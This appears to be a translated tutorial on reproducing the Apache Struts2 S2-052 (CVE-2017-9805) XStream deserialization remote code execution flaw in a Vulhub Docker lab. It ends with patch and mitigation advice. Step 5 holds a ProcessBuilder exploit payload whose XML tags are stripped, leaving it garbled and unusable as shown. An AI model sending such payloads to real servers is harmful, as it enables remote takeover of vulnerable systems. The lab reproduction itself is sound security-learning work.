Shulou(Shulou.com)05/31 Report--

The content of this article mainly focuses on how to achieve Apache Struts2--052 remote code execution vulnerability replication, the article content is clear and easy to understand, organized, very suitable for beginners to learn, worth reading. Interested friends can read along with Xiaobian. I hope everyone gets something out of this article!

0x00 Vulnerability Description

On September 5, 2017, Apache Struts released its latest security bulletin, which states that the REST plugin for Apache Struts 2.5.x has a high-risk vulnerability for remote code execution, vulnerability number CVE-2017-9805 (S2-052). The vulnerability is caused by remote code execution due to the lack of any type filtering when deserializing XStream instances using XStreamHandler.

0x01 Impact Version

Apache Struts 2.5 - Struts 2.5.12

Apache Struts 2.1.2 - Struts 2.3.33

0x02 Bug recurrence

Virtual machine deployment docker installation Vulhub one-click build vulnerability testing range environment.

docker-compose up -d

1. Access vulnerability environment

http://192.168.60.131:8080/orders.xhtml

2. Modify POST data by editing

3. The rest-plugin will judge the file parsing method according to the URI extension or Content-Type. You need to modify xhtml or modify the Content-Type header to application/xml to pass XML data in Body.

4. Modify the Content-Type type for packet capture

5, XML format Payload data package construction

0false0touch/tmp/yunzui.txtfalsejava.lang.ProcessBuilderstartfoofoofalse00falsefalse0

6. Exploit vulnerabilities through payload, execute commands, and return a response 500 status code, but the execution is successful.

touch /tmp/yunzui.txt

7. The command execution result enters docker to view and is successfully executed.

docker-compose exec struts2 bash

ls -al /tmp

0x03 Repair suggestions

1. Upgrade Apache struts 2.5.13 or 2.3.34

2. If the Struts REST plug-in is not used in the system, you can delete the Struts REST plug-in directly, or add the following code to the configuration file to restrict the extension of the server file.

3. Limit server-side extension types and remove XML support

Thank you for reading, I believe you have a certain understanding of "how to achieve Apache Struts2--052 remote code execution vulnerability recurrence", go to practice it quickly, if you want to know more related knowledge points, you can pay attention to the website! The editor will continue to bring better articles to everyone!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.